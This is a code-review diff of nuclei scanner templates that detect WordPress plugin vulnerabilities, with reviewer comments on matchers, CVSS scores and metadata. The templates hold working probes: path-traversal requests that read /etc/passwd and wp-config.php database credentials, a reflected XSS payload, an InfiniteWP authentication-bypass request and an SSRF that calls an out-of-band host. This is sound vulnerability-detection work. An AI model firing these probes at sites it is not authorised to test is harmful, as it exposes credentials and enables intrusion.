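Review bot: The metadata in shortcode-lfi is internally inconsistent: `name` and `description` talk about "Download Shortcode" version 0.2.3, while the only reference is the Packet Storm advisory titled for "ShortCode 1.1", and the google-dork is `inurl:wp/wp-content/force-download.php` whereas the request path has no `wp/` prefix. Please confirm which plugin and version the advisory actually covers and align the name, description and dork with it. A one-line `remediation:` (or a note that the plugin is unmaintained, if that is the case) would also help consumers triage a hit that reads the database credentials out of `wp-config.php`.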
@@ -0,0 +1,25 @@ +id: simple-image-manipulator-lfi + +info: + name: Simple Image Manipulator v1.0 - Remote file download + author: dhiyaneshDK + severity: high + description: In ./simple-image-manipulator/controller/download.php no checks are made to authenticate user or sanitize input when determining file location. + reference: + - https://packetstormsecurity.com/files/132962/WordPress-Simple-Image-Manipulator-1.0-File-Download.html + tags: wordpress,wp-plugin,lfi,wp + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd' + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/vulnerabilities/wordpress/sniplets-lfi.yaml b/vulnerabilities/wordpress/sniplets-lfi.yaml new file mode 100644 index 0000000000..757dff08fe --- /dev/null +++ b/vulnerabilities/wordpress/sniplets-lfi.yaml @@ -0,0 +1,27 @@ +id: sniplets-lfi + +info: + name: Wordpress Plugin Sniplets 1.1.2 - LFI + author: dhiyaneshDK + severity: high + reference: + - https://www.exploit-db.com/exploits/5194 + tags: wordpress,wp-plugin,lfi,wp + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DB_NAME" + - "DB_PASSWORD" + condition: and + + - type: status + status: + - 200 diff --git a/vulnerabilities/wordpress/sniplets-xss.yaml b/vulnerabilities/wordpress/sniplets-xss.yaml new file mode 100644 index 0000000000..195e8e384f --- /dev/null +++ b/vulnerabilities/wordpress/sniplets-xss.yaml 
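Review bot: The request path carries a literal `./` segment, `/wp-content/plugins/./simple-image-manipulator/controller/download.php`, copied from the advisory's relative path; it is not part of the real URL, and servers or WAFs that do not normalise dot segments will 404 on it while those that do gain nothing from it. Use `'{{BaseURL}}/wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=/etc/passwd'`. The `/etc/passwd` probe only proves the issue on Unix hosts; that matches the other LFI templates in this change, so it is a known limitation rather than a defect, but worth a word in `description`.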
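Review bot: The sniplets-lfi template ships with no `description`, unlike the neighbouring templates in this change, so a finding carries only the title and an Exploit-DB link. A sentence such as `description: Per the referenced advisory, modules/syntax_highlight.php includes the file named by the libpath parameter without validation, allowing local file inclusion.` would let a reader understand the hit without leaving the report. The traversal depth of four from `/wp-content/plugins/sniplets/modules/` lands in the web root, which matches the `wp-config.php` target.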
@@ -0,0 +1,31 @@ +id: sniplets-xss + +info: + name: Wordpress Plugin Sniplets - Cross-Site Scripting + author: dhiyaneshDK + severity: medium + description: Cross-site scripting (XSS) on Wordpress Plugin Sniplets + reference: + - https://www.exploit-db.com/exploits/5194 + tags: xss,wordpress,wp-plugin,wp + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml b/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml index 55110ec907..ba75da6fa4 100644 --- a/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml +++ b/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml @@ -5,7 +5,8 @@ info: author: 0x_Akoko severity: medium description: The Ultimate Member WordPress plugin was vulnerable to an Unauthenticated Open Redirect vulnerability, affecting the registration and login pages where the "redirect_to" GET parameter was used. - reference: https://wpscan.com/vulnerability/97823f41-7614-420e-81b8-9e735e4c203f + reference: + - https://wpscan.com/vulnerability/97823f41-7614-420e-81b8-9e735e4c203f tags: wp-plugin,redirect,wordpress requests: diff --git a/vulnerabilities/wordpress/video-synchro-pdf-lfi.yaml b/vulnerabilities/wordpress/video-synchro-pdf-lfi.yaml new file mode 100644 index 0000000000..4e25b1b4b0 --- /dev/null +++ b/vulnerabilities/wordpress/video-synchro-pdf-lfi.yaml 
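Review bot: As rendered here the first `words` entry in sniplets-xss is `""`; an empty word matches every body, so together with the `text/html` header and 200 status the template would flag any host that serves `warning.php` at all. If the intended value was stripped during extraction it should be the decoded payload from the request, `"</script><script>alert(document.domain)</script>"`; please restore it so a hit actually proves reflection. The ultimatemember hunk on this line is a reference reformat and needs nothing.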
@@ -0,0 +1,25 @@ +id: video-synchro-pdf-lfi + +info: + name: Videos sync PDF 1.7.4 - Unauthenticated Local File Inclusion + author: Hassan Khan Yusufzai - Splint3r7 + severity: high + reference: + - https://www.exploit-db.com/exploits/50844 + - https://wordpress.org/plugins/video-synchro-pdf/ + tags: wordpress,wp-plugin,lfi,wp + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../etc/passwd%00' + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml b/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml index 8dda442e3f..5c7fdc88b3 100644 --- a/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml +++ b/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml @@ -1,13 +1,14 @@ id: w3c-total-cache-ssrf + info: name: Wordpress W3C Total Cache SSRF <= 0.9.4 author: random_robbie severity: medium - tags: wordpress,wp-plugin description: The W3 Total Cache WordPress plugin was affected by an Unauthenticated Server Side Request Forgery (SSRF) security vulnerability. reference: - https://wpvulndb.com/vulnerabilities/8644 - https://klikki.fi/adv/w3_total_cache.html + tags: wordpress,wp-plugin,cache,ssrf requests: - method: GET @@ -17,4 +18,4 @@ requests: - type: word words: - "NessusFileIncludeTest" - part: body \ No newline at end of file + part: body diff --git a/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml b/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml index c7641f841a..abbcd5095b 100644 --- a/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml +++ b/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml 
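Review bot: The only path in video-synchro-pdf-lfi ends in `%00`. A null byte truncates an appended extension on PHP releases before 5.3.4, but every later release rejects a path containing a null byte outright, so on a current host the template returns a false negative even when `tout.php` is vulnerable. Add a second path without the terminator, `'{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../etc/passwd'`, and keep the `%00` variant for legacy installs; the existing regex and status matchers apply to both unchanged.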
@@ -5,7 +5,8 @@ info: author: 0x_Akoko severity: low description: The WordPress Weekender Newspaper Themes allows remote attackers to redirect users to an attacker controlled URL. - reference: https://cxsecurity.com/issue/WLB-2020040103 + reference: + - https://cxsecurity.com/issue/WLB-2020040103 tags: wordpress,wp-plugin,redirect requests: diff --git a/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml b/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml index 226a87797b..efb3cccd26 100644 --- a/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml +++ b/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml @@ -1,9 +1,14 @@ id: wordpress-accessible-wpconfig + info: - name: WordPress accessible wp-config + name: WordPress wp-config Detection author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n - severity: high - description: The remote WordPress installation has the `wp-config` file remotely accessible and its content available for reading. + severity: medium + description: WordPress `wp-config` was discovered. This file is remotely accessible and its content available for reading. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 tags: wordpress,backup requests: @@ -43,3 +48,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/04/12 diff --git a/vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml b/vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml index 47348a7a21..9edd719f2c 100644 --- a/vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml +++ b/vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml @@ -1,10 +1,10 @@ id: wordpress-affiliatewp-log info: - name: WordPress Plugin "AffiliateWP – Allowed Products" Log Disclosure + name: WordPress Plugin "AffiliateWP -- Allowed Products" Log Disclosure author: dhiyaneshDK severity: low - tags: wordpress,log + tags: wordpress,log,plugin requests: - method: GET 
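Review bot: The downgrade of wordpress-accessible-wpconfig to medium with `C:L` understates what the finding exposes: a readable `wp-config.php` discloses the database credentials and the authentication salts, which is a full confidentiality loss and usually a direct route to the database or to forged sessions. If the matchers (outside this hunk) confirm the file body rather than just a 200, I would keep `severity: high` and use `cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N` with `cvss-score: 7.5`. The new title "wp-config Detection" also reads like a fingerprint rather than an exposure; "WordPress wp-config.php Exposure" would say what the hit means.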
diff --git a/vulnerabilities/wordpress/wordpress-bbpress-plugin-listing.yaml b/vulnerabilities/wordpress/wordpress-bbpress-plugin-listing.yaml index 2404e9dcb9..fd1ae9b37e 100644 --- a/vulnerabilities/wordpress/wordpress-bbpress-plugin-listing.yaml +++ b/vulnerabilities/wordpress/wordpress-bbpress-plugin-listing.yaml @@ -5,8 +5,9 @@ info: author: dhiyaneshDK severity: info description: Searches for sensitive directories present in the bbpress wordpress plugin. - reference: https://www.exploit-db.com/ghdb/6158 - tags: wordpress,listing + reference: + - https://www.exploit-db.com/ghdb/6158 + tags: wordpress,listing,plugin requests: - method: GET diff --git a/vulnerabilities/wordpress/wordpress-elementor-plugin-listing.yaml b/vulnerabilities/wordpress/wordpress-elementor-plugin-listing.yaml index ed40dd3432..3f1e03ab8f 100644 --- a/vulnerabilities/wordpress/wordpress-elementor-plugin-listing.yaml +++ b/vulnerabilities/wordpress/wordpress-elementor-plugin-listing.yaml @@ -5,8 +5,9 @@ info: author: dhiyaneshDK severity: info description: Searches for sensitive directories present in the elementor wordpress plugin. - reference: https://www.exploit-db.com/ghdb/6297 - tags: wordpress,listing + reference: + - https://www.exploit-db.com/ghdb/6297 + tags: wordpress,listing,plugin requests: - method: GET diff --git a/vulnerabilities/wordpress/wordpress-emergency-script.yaml b/vulnerabilities/wordpress/wordpress-emergency-script.yaml index b575cc4a57..112f406c86 100644 --- a/vulnerabilities/wordpress/wordpress-emergency-script.yaml +++ b/vulnerabilities/wordpress/wordpress-emergency-script.yaml @@ -4,8 +4,9 @@ info: name: WordPress Emergency Script author: dwisiswant0 severity: info + reference: + - https://wordpress.org/support/article/resetting-your-password/#using-the-emergency-password-reset-script tags: wordpress - reference: https://wordpress.org/support/article/resetting-your-password/#using-the-emergency-password-reset-script requests: - method: GET 
diff --git a/vulnerabilities/wordpress/wordpress-git-config.yaml b/vulnerabilities/wordpress/wordpress-git-config.yaml index 623ab5f4aa..0373acfeb3 100644 --- a/vulnerabilities/wordpress/wordpress-git-config.yaml +++ b/vulnerabilities/wordpress/wordpress-git-config.yaml @@ -5,7 +5,8 @@ info: author: nerrorsec severity: info description: Searches for the pattern /.git/config inside themes and plugins folder. - reference: https://hackerone.com/reports/248693 + reference: + - https://hackerone.com/reports/248693 tags: config,git,exposure,wordpress,wp-plugin,wp-theme requests: diff --git a/vulnerabilities/wordpress/wordpress-gtranslate-plugin-listing.yaml b/vulnerabilities/wordpress/wordpress-gtranslate-plugin-listing.yaml index b8dae0946e..10e417ba5c 100644 --- a/vulnerabilities/wordpress/wordpress-gtranslate-plugin-listing.yaml +++ b/vulnerabilities/wordpress/wordpress-gtranslate-plugin-listing.yaml @@ -5,8 +5,9 @@ info: author: dhiyaneshDK severity: info description: Searches for sensitive directories present in the gtranslate wordpress plugin. - reference: https://www.exploit-db.com/ghdb/6160 - tags: wordpress,listing + reference: + - https://www.exploit-db.com/ghdb/6160 + tags: wordpress,listing,plugin requests: - method: GET diff --git a/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml b/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml index ab2d3656d9..df56152a95 100644 --- a/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml +++ b/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml 
@@ -4,7 +4,15 @@ info: name: WordPress InfiniteWP Client Authentication Bypass author: princechaddha severity: critical - reference: https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/ + description: InfiniteWP Client plugin versions 1.9.4.4 or earlier contain a critical authentication bypass vulnerability. InfiniteWP Client is a plugin that, when installed on a WordPress site, allows a site owner + to manage unlimited WordPress sites from their own server. + reference: + - https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/ + - https://wordpress.org/plugins/iwp-client/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + remediation: Upgrade to InfiniteWP Client 1.9.4.5 or higher. tags: wordpress,auth-bypass,wp-plugin requests: @@ -21,7 +29,7 @@ requests: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded - _IWP_JSON_PREFIX_{{base64("{\"iwp_action\":\"add_site\",\"params\":{\"username\":\"§username§\"}}")}} + _IWP_JSON_PREFIX_{{base64("{\"iwp_action\":\"add_site\",\"params\":{\"username\":\"{{username}}\"}}")}} redirects: true extractors: @@ -55,4 +63,6 @@ requests: part: body - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/03/21 diff --git a/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml b/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml index 60be402e20..d4a0254656 100644 --- a/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml +++ b/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml 
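Review bot: Switching the payload to `{{username}}` makes the InfiniteWP template depend on a variable that nothing in the file defines; without `-var username=<login>` recent nuclei releases report an unresolved variable and skip the request, and older ones send the literal placeholder, so the auth bypass is never attempted. State the requirement where users will see it, e.g. add `# requires a valid WordPress username: nuclei -t ... -var username=admin` under `info`, or give it a default in a `variables:` block if the project supports one. The new `classification` block could also carry `cwe-id: CWE-287` for consistency with the other enhanced templates in this change.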
@@ -4,10 +4,11 @@ info: name: WordPress SimpleFilelist Unauthenticated Arbitrary File Upload RCE author: princechaddha severity: critical - reference: https://wpscan.com/vulnerability/10192 description: | The Simple File List WordPress plugin was found to be vulnerable to an unauthenticated arbitrary file upload leading to remote code execution. The Python exploit first uploads a file containing PHP code but with a png image file extension. A second request is sent to move (rename) the png file to a PHP file. - tags: wordpress,wp-plugin,rce,intrusive + reference: + - https://wpscan.com/vulnerability/10192 + tags: wordpress,wp-plugin,rce,intrusive,upload,python requests: - raw: diff --git a/vulnerabilities/wordpress/wordpress-redirection-plugin-listing.yaml b/vulnerabilities/wordpress/wordpress-redirection-plugin-listing.yaml index dfad16747a..5c849255aa 100644 --- a/vulnerabilities/wordpress/wordpress-redirection-plugin-listing.yaml +++ b/vulnerabilities/wordpress/wordpress-redirection-plugin-listing.yaml @@ -5,8 +5,9 @@ info: author: dhiyaneshDk severity: info description: Searches for sensitive directories present in the wordpress-redirection plugin. - reference: https://www.exploit-db.com/ghdb/6436 - tags: wordpress,listing + reference: + - https://www.exploit-db.com/ghdb/6436 + tags: wordpress,listing,plugin requests: - method: GET diff --git a/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml b/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml new file mode 100644 index 0000000000..6e0733ca6e --- /dev/null +++ b/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml 
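Review bot: The added `python` tag on the SimpleFilelist template is misleading: the description mentions a Python proof-of-concept, but tags drive template selection (`-tags python`), and there is nothing Python-specific about this WordPress upload check. Drop `python` and keep `upload`; `intrusive` already correctly marks that the template writes a file to the target.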
@@ -0,0 +1,21 @@ +id: wordpress-ssrf-oembed + +info: + name: Wordpress Oembed Proxy SSRF + author: dhiyaneshDk + severity: medium + reference: + - https://book.hacktricks.xyz/pentesting/pentesting-web/wordpress + - https://github.com/incogbyte/quickpress/blob/master/core/req.go + tags: wordpress,ssrf,oast,proxy + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-json/oembed/1.0/proxy?url=http://{{interactsh-url}}/" + + matchers: + - type: word + part: interactsh_protocol + words: + - "http" diff --git a/vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml b/vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml index 3309a80e9e..6dd3f645af 100644 --- a/vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml +++ b/vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml @@ -4,7 +4,8 @@ info: name: WordPress Total Upkeep Database and Files Backup Download author: princechaddha severity: high - reference: https://www.exploit-db.com/exploits/49252 + reference: + - https://www.exploit-db.com/exploits/49252 tags: wordpress,wp-plugin requests: diff --git a/vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml b/vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml index 90f297f2fa..844fa85bbc 100644 --- a/vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml +++ b/vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml @@ -4,7 +4,8 @@ info: name: UpdraftPlus Plugin Pem Key author: dhiyaneshDk severity: info - reference: https://www.exploit-db.com/ghdb/6437 + reference: + - https://www.exploit-db.com/ghdb/6437 tags: wordpress,wp-plugin requests: diff --git a/vulnerabilities/wordpress/wordpress-woocommerce-listing.yaml b/vulnerabilities/wordpress/wordpress-woocommerce-listing.yaml index a1f28d4054..b42a797679 100644 --- a/vulnerabilities/wordpress/wordpress-woocommerce-listing.yaml +++ b/vulnerabilities/wordpress/wordpress-woocommerce-listing.yaml 
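Review bot: As far as I recall, WordPress core guards `/wp-json/oembed/1.0/proxy` with a permission callback requiring `edit_posts`, so an unauthenticated request is refused before any outbound fetch and the interactsh matcher would never fire on a default install. Either document that a contributor-level session is needed (add the `authenticated` tag and a login step as the other authenticated templates in this change do) or state in the description that a hit indicates a misconfigured endpoint. A `description` is missing in any case; `description: The WordPress oEmbed proxy REST endpoint fetches an attacker-supplied URL server-side; an out-of-band interaction confirms SSRF.` would cover it.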
@@ -5,8 +5,9 @@ info: author: dhiyaneshDK severity: info description: Searches for sensitive directories present in the woocommerce wordpress plugin. - reference: https://www.exploit-db.com/ghdb/6192 - tags: wordpress,listing + reference: + - https://www.exploit-db.com/ghdb/6192 + tags: wordpress,listing,plugin,woocommerce requests: - method: GET diff --git a/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml b/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml index f3efbb1457..8a96cfe510 100644 --- a/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml +++ b/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml @@ -1,13 +1,19 @@ id: wordpress-woocommerce-sqli info: - name: Unauthenticated SQL injection Woocommerce + name: Woocommerce Unauthenticated SQL Injection author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan,madrobot severity: critical - tags: wordpress,woocomernce,sqli,wp-plugin + description: The Woocommerce plugin for Wordpress contains an unauthenticated SQL injection vulnerability. reference: - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021 - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx + - https://securitynews.sonicwall.com/xmlpost/wordpress-woocommerce-plugin-sql-injection/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-89 + tags: wordpress,woocommerce,sqli,wp-plugin,injection requests: - method: GET @@ -32,4 +38,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/03/21 diff --git a/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml b/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml index 28476103e4..05bc6af882 100644 --- a/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml +++ b/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml 
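Review bot: The WooCommerce classification sets `S:C` with a 10.0 score; a changed scope implies impact on a component beyond the vulnerable WordPress instance, which is unusual for a plugin SQL injection and is not supported by the description. Unless one of the references justifies it, `cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` with `cvss-score: 9.8` is the conventional vector and matches the InfiniteWP entry in this same change. The description would also benefit from the affected version range if the references give one.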
@@ -1,6 +1,7 @@ id: wordpress-wordfence-lfi + info: - name: Wordpress Plugin wordfence.7.4.5 - Local File Disclosure + name: Wordpress Wordfence 7.4.5 - Arbitrary File Retrieval author: 0x_Akoko severity: high reference: @@ -18,7 +19,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml b/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml index cc1ca1e573..b0a50a1cfe 100644 --- a/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml +++ b/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml @@ -1,11 +1,12 @@ id: wordpress-wordfence-waf-bypass-xss info: + name: Wordpress Wordfence WAF - Cross-Site Scripting author: hackergautam - name: Wordfence WAF Bypass WordPress XSS - reference: https://twitter.com/naglinagli/status/1382082473744564226 severity: medium - tags: wordpress,wordfence,xss + reference: + - https://twitter.com/naglinagli/status/1382082473744564226 + tags: wordpress,wordfence,xss,bypass requests: - method: GET @@ -26,4 +27,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml b/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml index f005ff8557..5ada86210a 100644 --- a/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml +++ b/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml @@ -4,7 +4,7 @@ info: name: WordPress Wordfence 7.4.6 Cross Site Scripting author: madrobot severity: medium - tags: wordpress,wp-plugin,xss + tags: wordpress,wp-plugin,xss,wordfence requests: - method: GET @@ -25,4 +25,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/vulnerabilities/wordpress/wordpress-wp-cron.yaml b/vulnerabilities/wordpress/wordpress-wp-cron.yaml new file mode 100644 index 0000000000..2046c2e65c --- /dev/null 
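Review bot: The tightened Wordfence regex `root:.*:0:0:` still uses an unbounded `.*`, while the other LFI templates in this change match `root:[x*]:0:0`; for consistency and fewer false positives use `- "root:[x*]:0:0:"` here too. The rename to "Arbitrary File Retrieval" is clearer than the old title. The waf-bypass and wordfence-xss hunks on this line are metadata reorders and need nothing.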
+++ b/vulnerabilities/wordpress/wordpress-wp-cron.yaml @@ -0,0 +1,37 @@ +id: wordpress-wp-cron + +info: + name: Wordpress wp-cron.php DOS + author: pathtaga + severity: info + description: When this file is accessed a heavy MySQL query is performed, so it could be used by attackers to cause a DoS. + reference: + - https://book.hacktricks.xyz/pentesting/pentesting-web/wordpress + - https://medium.com/@thecpanelguy/the-nightmare-that-is-wpcron-php-ae31c1d3ae30 + tags: wordpress,cron,wp,dos + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/wp-cron.php" + + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - (regex("]+s\d+\.wp\.com",body_1)) + - (regex("